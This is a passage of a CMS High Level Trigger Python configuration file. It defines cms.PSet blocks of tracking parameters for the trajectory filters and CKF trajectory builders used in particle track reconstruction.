minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 100 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0PSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 4 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2HighPtTkMuPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMuTrackJpsiEffTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 9 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairCkfTrajectoryBuilderForHIGlobalPt8 = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHIGlobalPt8" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 2 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtStepTrajectoryFilter = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 1 ),
minPt = cms.double( 0.075 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTSeedFromConsecutiveHitsCreator = cms.PSet(
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
SeedMomentumForBOFF = cms.double( 5.0 ),
propagator = cms.string( "PropagatorWithMaterial" ),
forceKinematicWithRegionDirection = cms.bool( False ),
magneticField = cms.string( "" ),
OriginTransverseErrorMultiplier = cms.double( 1.0 ),
ComponentName = cms.string( "SeedFromConsecutiveHitsCreator" ),
MinOneOverPtError = cms.double( 1.0 )
)
HLTPSetPixelPairCkfTrajectoryBuilderForHI = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairCkfTrajectoryFilterForHI" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedCkfTrajectoryBuilderForHI = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 0.0 ),
maxPtForLooperReconstruction = cms.double( 0.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHI" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHI" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter1PSetTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter1ESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter1PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedCkfTrajectoryBuilderForHIGlobalPt8 = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 0.0 ),
maxPtForLooperReconstruction = cms.double( 0.0 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOppositeForHI" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForHI" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2MeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedCkfTrajectoryFilterForHIGlobalPt8" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTSiStripClusterChargeCutForHI = cms.PSet( value = cms.double( 2069.0 ) )
HLTPSetLowPtStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuTrackJpsiEffTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuTrackJpsiEffTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 1 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetTrajectoryFilterForElectrons = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( -1 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( -1 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetJetCoreStepTrajectoryBuilder = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 50 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetJetCoreStepTrajectoryFilter" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPvClusterComparer = cms.PSet(
track_chi2_max = cms.double( 9999999.0 ),
track_pt_max = cms.double( 10.0 ),
track_prob_min = cms.double( -1.0 ),
track_pt_min = cms.double( 2.5 )
)
HLTIter0HighPtTkMuPSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0HighPtTkMuPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryFilterBase = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.05 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter1GroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter1ESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter1PSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator16" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 5.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMuonCkfTrajectoryBuilderSeedHit = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
ComponentType = cms.string( "MuonCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMuonCkfTrajectoryFilter" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( False ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( True ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelPairCkfTrajectoryFilterForHI = cms.PSet(
minimumNumberOfHits = cms.int32( 6 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 100 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.2 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 4 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilter = cms.PSet(
